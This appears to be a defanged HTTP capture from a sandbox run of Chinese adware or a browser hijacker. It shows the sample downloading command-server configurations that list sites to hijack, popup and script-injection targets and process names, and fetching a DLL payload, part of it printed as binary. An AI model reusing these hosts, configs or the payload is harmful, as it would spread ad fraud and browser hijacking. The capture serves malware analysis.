<<< skipped >>>

GET /send/exitpop.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 572
Content-Type: text/plain
Last-Modified: Mon, 01 Feb 2016 14:47:23 GMT
Accept-Ranges: bytes
ETag: "d479c675ff5cd11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:5 (Cdn Cache Server V2.0), 1.1 jinh94:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[push]..time=5..user=..BaiduClose=..RightClose=..QQClose=..HtcClose=..
[email protected]=..Baidu
JcClose=..DhUrl=hXXp://123.sogou.com/?af71105-0003..[pushurl1]..url=ht
tp://VVV.168wm.net/pro/index.htm..[url1]..user=..1=VVV.baidu.com..2=wd
=..3=pn=..ep=1..url=....[url2]..user=..1=hXXp://VVV.sina.com.cn/..ep=1
..url=..[url3]..user=..1=VVV.sogou.com..2=query=..3=page=..ep=1..url=.
...[url4]..user=..1=VVV.17173.com..ep=1..url=....[url5]..user=..1=user
.qzone.qq.com..ep=1..url=..[url6]..user=..1=bbs.yoka.com..ep=1..url=....



GET /send/yxjk/yxjpq.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:37:47 GMT
Content-Length: 588
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2016 03:31:31 GMT
Accept-Ranges: bytes
ETag: "44ce4806f2d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:2 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
hnrwdong*skin_lol/html/[email protected]/client/15v1.html@072008.
[email protected]@110060063@906081@907810@905899@907811@116940004@?
[email protected]@[email protected]@[email protected]@dnf.tga.plu
.cn/[email protected]/htmlcode/227@[email protected]/htm
lcode/218@[email protected]@0045002000001@?m=yw207&sss@?m=yw207&ss
s@?m=tubiao113&sss@[email protected]@[email protected]@
[email protected]@pubwin*.hao123.com@pubwin*.baidu.com@pubwin*sogou
.com@[email protected]@[email protected]@[email protected].
[email protected]@.fookea.com
....



GET /send/eb.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 20:08:36 GMT
Content-Length: 13363
Content-Type: text/plain
Last-Modified: Fri, 12 Dec 2014 08:31:01 GMT
Accept-Ranges: bytes
ETag: "f23f69f6e515d01:a55b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:4 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
user.qzone.qq.com^17^^10..item.taobao.com^17^^10..favorite.taobao.com^
17^^10..shoucang.taobao.com^17^^10..VVV.taobao.com^17^^10..ju.taobao.c
om^17^^10..taobao.com/search?^17^^10..trade.taobao.com^17^^10...tmall.
com/item.htm^17^^10..list.tmall.com/search^17^^10..VVV.tmall.com^17^^1
0...jd.com^7^^400...7cv.com^7^^400..ctrip.com^7^^400..ctrip.com^7^^400
..7daysinn.cn^7^^400...vip.com^7^^400..pb89.com^7^^400..yougou.com^7^^
400..nuomi.com^7^^400..xiangshe.com^7^^400..xiangguo.tv^7^^400..blzoom
.com^7^^400..paixie.net^7^^400...lovo.cn^7^^400..wangjiu.com^7^^400..t
iantian.com^7^^400..mbaobao.com^7^^400..aizhigu.com.cn^7^^400..redbaby
.suning.com^7^^400..keede.com^7^^400..bookschina.com^7^^400..dangdang.
com^7^^400..dhc.net.cn^7^^400..winxuan.com^7^^400..lefeng.com^7^^400..
.no5.com.cn^7^^400...jxdyf.com^7^^400...d1.com.cn^7^^400...newegg.cn^7
^^400...xiu.com^7^^400...leyou.com.cn^7^^400...yidianda.com^7^^400...c
hina-pub.com^7^^400...x.com.cn^7^^400...yhd.com^7^^400...quwan.com^7^^
400...masamaso.com^7^^400...yohobuy.com^7^^400...vip.com^7^^400...wine
nice.com^7^^400...yesmywine.com^7^^400...chunshuitang.com^7^^400...vsi
go.cn^7^^400...womai.com^7^^400...s.cn^7^^400...lamiu.com^7^^400..beif
abook.com^7^^400...pb89.com^7^^400...m18.com^7^^400...oohdear.com^7^^4
00...yixun.com^7^^400...happigo.com^7^^400...tiantian.com^7^^400...jus
tyle.com^7^^400...suning.com^7^^400..muyingzhijia.com^7^^400...hecha.c
n^7^^400...e-lining.com^7^^400..xifuquan.com^7^^400..paixie.net^7^^400
..vjia.com^7^^400..lusen.com^7^^400..chris-tina.com^7^^400..shangp

<<< skipped >>>

GET /send/yxjk/jzyxj.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 14:38:20 GMT
Content-Length: 8416
Content-Type: text/plain
Last-Modified: Fri, 05 Aug 2016 02:27:44 GMT
Accept-Ranges: bytes
ETag: "48afbf2c0eed11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:6 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
dev.tg.wan.360.cn^^^800002..360tg.6711.com^^^800002..g.b.twyxi.com^^^8
00002...i5399.com^^^800002..g.6gh4.com^^^800002..tg.xylhgw.com^^^80000
2..g.s8dj.com^^^800002..t.xydhl.com^^^800002..t.cyuew.com^^^800002..*.
.........^^^800002...13resy.com^^^800002...luxi0891.com^^^800002...wyw
gx.com^^^800002...5p0n.com^^^800002..bai880.9ok2016.com^^^800002..bai6
60.android882.com^^^800002...51korean.com^^^800002...a3t6.cn/08^^^8000
02..183.61.162.85^^^800002...3gg.com^^^800002...926aasf.com^^^800002..
.kkkggg.cn^^^800002..70803344.com^^^800002...g5h5.com/bd^^^800002..cls
.d54p.com^^^800002...52sf-lsi.com^^^800002...myfirstweb.cn^^^800002..1
83.61.162.86^^^800002...hgjg12.com^^^800002...woaisf2016.com^^^800002.
..haha2016.com^^^800002..qo8.m3b3.com^^^800002..zd.91913.cn^^^800002..
VVV.zhaocs.com^^^800002..bai123.q77169.com^^^800002...888ppk.cn^^^8000
02...7lph.com^^^800002..4gfbf.jghr11.com^^^800002...futusff8.com^^^800
002..bai330.tel2016.com^^^800002...qubasfkf.com^^^800002...asf.baidu1.
com^^^800002..4fvrh.11vfsa.com^^^800002..info.yitsoftware.com^^^800002
...12hjfrg.com^^^800002..6ag.3loz.com^^^800002...sjh520.com^^^800002..
VVV.uc48.com/08^^^800002..*..........^^^800002..*....1.76^^^800002..*.
.........^^^800002..*..........^^^800002..*........^^^800002..g.b28g.c
om^^^800002..VVV.4399.com^^^800002..wan.sogou.com/^^^800002..tg.51.com
^^^800002..g.fd4f.com^^^800002..g.b28g.com^^^800002..sx.juygj.com^^^80
0002..*....PK^^^800002..*......boss^^^800002..*..........^^^800002..*8
0......^^^800002..*........^^^800002..*............^^^800002..*...

<<< skipped >>>

GET /send/tfgg.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 454
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2016 02:15:19 GMT
Accept-Ranges: bytes
ETag: "144bbaaee083d11:a404"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:1 (Cdn Cache Server V2.0)
Connection: keep-alive
placeid=193...7977w.com/htmlcode/193..23kmm.com/htmlcode/227..placeid=
227...23kmm.com/htmlcode/218..placeid=218..hXXp://pop.duoqu.com/lt.htm
l__1__lt_002__253_1254_2__42.html..hXXp://VVV.xingbo.tv/burning?chan=2
8..hXXp://VVV.xingbo.tv/burning?chan=80..tubiao113..hXXp://VVV.game485
.com/agrt.html?id=300680&p..hXXp://VVV.game485.com/agrt.html?id=153521
&p=i..907046..907811..906081..907810..120435..xuanchuanyiunion.cpm..fz
cg.zhengheinc.com..90360772_hao_pgHTTP/1.1 200 OK..Date: Sat, 24 Sep 2
016 17:21:04 GMT..Content-Length: 454..Content-Type: text/plain..Last-
Modified: Tue, 22 Mar 2016 02:15:19 GMT..Accept-Ranges: bytes..ETag: "
144bbaaee083d11:a404"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NE
T..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jinh93:8103 (
Cdn Cache Server V2.0), 1.1 jinh94:1 (Cdn Cache Server V2.0)..Connecti
on: keep-alive..placeid=193...7977w.com/htmlcode/193..23kmm.com/htmlco
de/227..placeid=227...23kmm.com/htmlcode/218..placeid=218..hXXp://pop.
duoqu.com/lt.html__1__lt_002__253_1254_2__42.html..hXXp://VVV.xingbo.t
v/burning?chan=28..hXXp://VVV.xingbo.tv/burning?chan=80..tubiao113..ht
tp://VVV.game485.com/agrt.html?id=300680&p..hXXp://VVV.game485.com/agr
t.html?id=153521&p=i..907046..907811..906081..907810..120435..xuanchua
nyiunion.cpm..fzcg.zhengheinc.com..90360772_hao_pg
....

<<< skipped >>>

GET /send/prosafe.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:28:17 GMT
Content-Length: 845
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2016 03:19:29 GMT
Accept-Ranges: bytes
ETag: "c8f02e2c7ff3d11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:4 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
hintplugin.exe@*[email protected]@[email protected]@rwyc
[email protected]@[email protected]@*clsmn.exe@gamelauncher
[email protected]@[email protected]@*coobarclt.exe@*crossf
ire.exe@\................\@\......\hqg.exe@\[email protected]@lt
[email protected]......@\xmp\program\xpm.exe@\pstyle\qyclient.ex
e@\........2......\@\..............\launcher\[email protected]@jkn
[email protected]@........\....\autoupdate.exe@\........\cqby.exe@
[email protected]@\........\qkwebgamelogin.exe@\debug\explorer.ex
e@whclient\whwindow.exe@\....\[email protected]@*\tk
lobby.exe@\tkwebapp.exe@\tkcltnet.exe@\tkassistor.exe@\tklobby.exe@\jj
game\@\JJ......\@\gamemenu\[email protected]@*temp\temp\system.exe@*\
Temp\Temp\@[email protected]@[email protected]@\........\@xy2_launc
h.exe
....



GET /send/addjs/jslist.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 13:30:20 GMT
Content-Length: 7956
Content-Type: text/plain
Last-Modified: Mon, 05 Sep 2016 01:23:27 GMT
Accept-Ranges: bytes
ETag: "f6816a1a147d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:3 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
.xieedang123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..xieguotou.com^^^
hzuser@servce@hnrw@wskh^0^ietc.js...zhainandao.com^^^hzuser@servce@hnr
w@wskh^0^ietc.js...mm131.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...lao
nanren.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...laogedaojie.com^^^hzu
ser@servce@hnrw@wskh^0^ietc.js...colorbird.com^^^hzuser@servce@hnrw@ws
kh^0^ietc.js...5442.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...52kkm.or
g^^^hzuser@servce@hnrw@wskh^0^ietc.js...169bb.com^^^hzuser@servce@hnrw
@wskh^0^ietc.js..m.neihancun.net^^^hzuser@servce@hnrw@wskh^0^ietc.js..
.xieedang123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..rb.yesemn.com^^^
hzuser@servce@hnrw@wskh^0^ietc.js...5442.com^^^hzuser@servce@hnrw@wskh
^0^ietc.js...xmeise.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...xieedang
123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...ik123.com^^^hzuser@servc
e@hnrw@wskh^0^ietc.js...a4yy.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..
tuku.nvsay.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..static.yungengxin.
com^^^hzuser@servce@hnrw@wskh^0^ietc.js..mp.weixin.qq.com/s?^^^hzuser@
servce@hnrw@wskh^0^ietc.js..pubapi.yungengxin.com^^^hzuser@servce@hnrw
@wskh^0^ietc.js..VVV.yy6080.tv^^^hzuser@servce@hnrw@wskh^0^ietc.js..ww
w.yy6080.org^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.dytt8.net^^^hzus
er@servce@hnrw@wskh^0^ietc.js..VVV.80s.cn^^^hzuser@servce@hnrw@wskh^0^
ietc.js..qqsix.com.cn^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.qzone52
0.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.iqshw.com^^^hzuser@serv
ce@hnrw@wskh^0^ietc.js..mm.xmeise.com^^^hzuser@servce@hnrw@wskh^0^

<<< skipped >>>

GET /send/jzjc/jzjc.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 154
Content-Type: text/plain
Last-Modified: Thu, 25 Feb 2016 08:27:14 GMT
Accept-Ranges: bytes
ETag: "a2b9ca54a66fd11:a413"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:8104 (Cdn Cache Server V2.0), 1.1 jinh94:3 (Cdn Cache Server V2.0)
Connection: keep-alive
tgp_render.exe^..gamelauncher.exe^..\qq.exe^..runme.exe^..clsmn.exe^..
wxlltaidex.exe^..pubwinclient.exe^..svchost.exe^..jknbmsnew.exe^..barb
lientview.exe^
....



GET /send/jzjc/jzurl.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 1224
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2016 02:42:45 GMT
Accept-Ranges: bytes
ETag: "42ecb986473d11:a404"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:8080 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
^^.16mncr5.cn/2016/^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.xl
mqt.com^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.vs858.com^http
://VVV.168wm.net/jzurljc/index.htm^3^10..^^p.m5bn.com/1/1265.html?uid=
3252^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.1x3x.com/z/bin056
gjsg2ico26^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.jielesh.com
^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^up.zhuiqu.com/html^htt
p://VVV.168wm.net/jzurljc/index.htm^3^10..^^t2.e719.net/g_20140331.asp
?u^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^news.a9377j.com/1869
/?gid^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^w.lj139.com/dxt/2
1417^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^11.800tx.com^http:
//VVV.168wm.net/jzurljc/index.htm^3^10..^^bdtg.37wanyy.cn/s/1/1317/449
85.html?uid=2390762^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^g.6
sfg.com/s/1/999/33990.html?uid=507162^hXXp://VVV.168wm.net/jzurljc/ind
ex.htm^3^10..^^121.40.32.124:^hXXp://VVV.168wm.net/jzurljc/index.htm^3
^10..^^777sf.ykski.com^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^
p.pp1o.com/s/1/1222/39228.html?uid=908833^hXXp://VVV.168wm.net/jzurljc
/index.htm^3^10..^^p.pp1o.com/s/1/1222/32215.html?uid=906636^hXXp://ww
w.168wm.net/jzurljc/index.htm^3^10
....

<<< skipped >>>

GET /send/newDomain.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:23:19 GMT
Content-Length: 21
Content-Type: text/plain
Last-Modified: Fri, 24 Jun 2016 03:06:00 GMT
Accept-Ranges: bytes
ETag: "10baa56c5cdd11:a55b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:1 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)
Connection: keep-alive
hXXp://VVV.yaojyw.net
....



GET /send/jwico.txt HTTP/1.1

User-Agent: RookIE/1.0
Host: yxtt.v138.net


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 47
Content-Type: text/plain
Last-Modified: Wed, 07 Jan 2015 05:43:26 GMT
Accept-Ranges: bytes
ETag: "689c5fdb3c2ad01:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jinh94:5 (Cdn Cache Server V2.0)
Connection: keep-alive
@fyww@tlww@jingwang1@jingwang2@jingwang3@ahhfjw
....



GET /send/InsertWnd.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:45:23 GMT
Content-Length: 2402
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2016 03:33:23 GMT
Accept-Ranges: bytes
ETag: "a6b73c436f2d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:2 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
*browser..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc
/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc
/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc
/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc
/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://yxtt.v138.net/send/yxjtc
/iframeyxjlove.htm..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome_Wid
getWin_0..2^BRMainFrameGUI..2^MozillaWindowClass..2^Maxthon3Cls_MainFr
m..2^QQBrowser_WidgetWin_0..3^........3^................3^........3^..
................ ..3^..........3^..........3^............3^yswm..3^...
.......3^485......4^1000^600..5^1..*browserTitle..1^5^40^7^320^270^0^0
^300^250^hXXp://yxtt.v138.net/send/yxjtc/ace.htm..2^360se6_Frame..2^Ch
rome_WidgetWin_1..2^Chrome_WidgetWin_0..2^BRMainFrameGUI..2^Maxthon3Cl
s_MainFrm..2^MozillaWindowClass..2^QQBrowser_WidgetWin_0..4^1000^700..
5^1..*browserVideo..1^820^220^5^215^308^0^0^195^288^hXXp://VVV.168wm.n
et/sp/t2345.asp?mdstr=..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome
_WidgetWin_0..2^BRMainFrameGUI..2^Maxthon3Cls_MainFrm..2^MozillaWindow
Class..2^QQBrowser_WidgetWin_0..2^IEFrame..3^..........3^..........4^1
000^700..5^1..7^..........7^..........7^......7^soso..7^......7^......
....*qq..1^-13^49^6^220^60^0^0^200^40^hXXp://123.1313k.net/send/yxjtc/
qqtdb.htm..2^TXGuiFoundation..3^QQ..3^..........3^............3^......
........3^......3^......3^..........3^............3^..........3^......
3^..........3^..........3^..........3^....Q......3^..........3^...

<<< skipped >>>

GET /send/yxjk/jzyxj.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 14:38:20 GMT
Content-Length: 8416
Content-Type: text/plain
Last-Modified: Fri, 05 Aug 2016 02:27:44 GMT
Accept-Ranges: bytes
ETag: "48afbf2c0eed11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:6 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
dev.tg.wan.360.cn^^^800002..360tg.6711.com^^^800002..g.b.twyxi.com^^^8
00002...i5399.com^^^800002..g.6gh4.com^^^800002..tg.xylhgw.com^^^80000
2..g.s8dj.com^^^800002..t.xydhl.com^^^800002..t.cyuew.com^^^800002..*.
.........^^^800002...13resy.com^^^800002...luxi0891.com^^^800002...wyw
gx.com^^^800002...5p0n.com^^^800002..bai880.9ok2016.com^^^800002..bai6
60.android882.com^^^800002...51korean.com^^^800002...a3t6.cn/08^^^8000
02..183.61.162.85^^^800002...3gg.com^^^800002...926aasf.com^^^800002..
.kkkggg.cn^^^800002..70803344.com^^^800002...g5h5.com/bd^^^800002..cls
.d54p.com^^^800002...52sf-lsi.com^^^800002...myfirstweb.cn^^^800002..1
83.61.162.86^^^800002...hgjg12.com^^^800002...woaisf2016.com^^^800002.
..haha2016.com^^^800002..qo8.m3b3.com^^^800002..zd.91913.cn^^^800002..
VVV.zhaocs.com^^^800002..bai123.q77169.com^^^800002...888ppk.cn^^^8000
02...7lph.com^^^800002..4gfbf.jghr11.com^^^800002...futusff8.com^^^800
002..bai330.tel2016.com^^^800002...qubasfkf.com^^^800002...asf.baidu1.
com^^^800002..4fvrh.11vfsa.com^^^800002..info.yitsoftware.com^^^800002
...12hjfrg.com^^^800002..6ag.3loz.com^^^800002...sjh520.com^^^800002..
VVV.uc48.com/08^^^800002..*..........^^^800002..*....1.76^^^800002..*.
.........^^^800002..*..........^^^800002..*........^^^800002..g.b28g.c
om^^^800002..VVV.4399.com^^^800002..wan.sogou.com/^^^800002..tg.51.com
^^^800002..g.fd4f.com^^^800002..g.b28g.com^^^800002..sx.juygj.com^^^80
0002..*....PK^^^800002..*......boss^^^800002..*..........^^^800002..*8
0......^^^800002..*........^^^800002..*............^^^800002..*...

<<< skipped >>>

GET /send/InsertWnd_2345title_en.dll HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 20:18:02 GMT
Content-Length: 157184
Content-Type: application/x-msdownload
Last-Modified: Mon, 18 Jan 2016 07:42:12 GMT
Accept-Ranges: bytes
ETag: "9af64bec351d11:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:4 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}|}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a......8..
.8...8....X..8.......8....X..8.......8....X..8...9...8....X..8.......8
....X..8.......8....X..8./.....8.bc123}}}}}}}}}}a2&12.|~}... }}}abc12.
}.\v|q}}..abs123.~}}M{}}.~ab#723}}m}m}}}.}agc023}}}x}|}}}}ab3723m}}}}}
}.}=`bc!23m}}}}m}}m}abc12#}}}.?{}1}}aN!72.}}}}={}Q.}abc123}}}}}}}}}}ar
72#}}}}}}}}}}abc123}}}}}}}}}}abc123}}}.F{}5}}abc123}}}}}}}}}}abc123}}
}}}}}}}}abc123}}}(-%M}}}ab.223m}}}}}}}y}abc123}}}}}}}.}}.73i.3}}}}..}}
.~ab=323y}}}}}}}}}abc12s}}.S....}}abs123={}}y}}}..abc123}}}}}}}=}}.bc1
23}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw...)./..b}72.2.}}.x}[x}.x`1F2A}h...gm.F.|P..
*[email protected].. ..Zi{..Cp...P....x......xk../.U..r....\....._e....l}
O..* N=....].eM.....P2>....;D..)E......>..S..............r.A1C.%
...2.4.jF....u..c)G...K.......Bq...?.$...YO...Sh..k....X1...KB..1..`.4
....i.p....W.p.m...fE.".Tc-......Xw`..vL.oD....T......g..C......Mw..*G
~..8.7ox..w..G...h.._vY\x..D....T.......}.iGb..V.].S.>...5.h.yX....
R...kI...._[X...n....M........`.&...l5&.....y.....J.Z..L.......b<..
.....6D<tM.b$C.;.(..H.....k......E.:..e|....e|D.....;Y...\...{w

<<< skipped >>>

GET /ip.asp HTTP/1.1
User-Agent: vb   wininet
Host: VVV.yswm.net


HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA; path=/
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<script>window.location.href='ip.asp?ip=194.242.96.226'</script>
....



GET /ip.asp HTTP/1.1

User-Agent: RookIE/1.0
Host: VVV.yswm.net
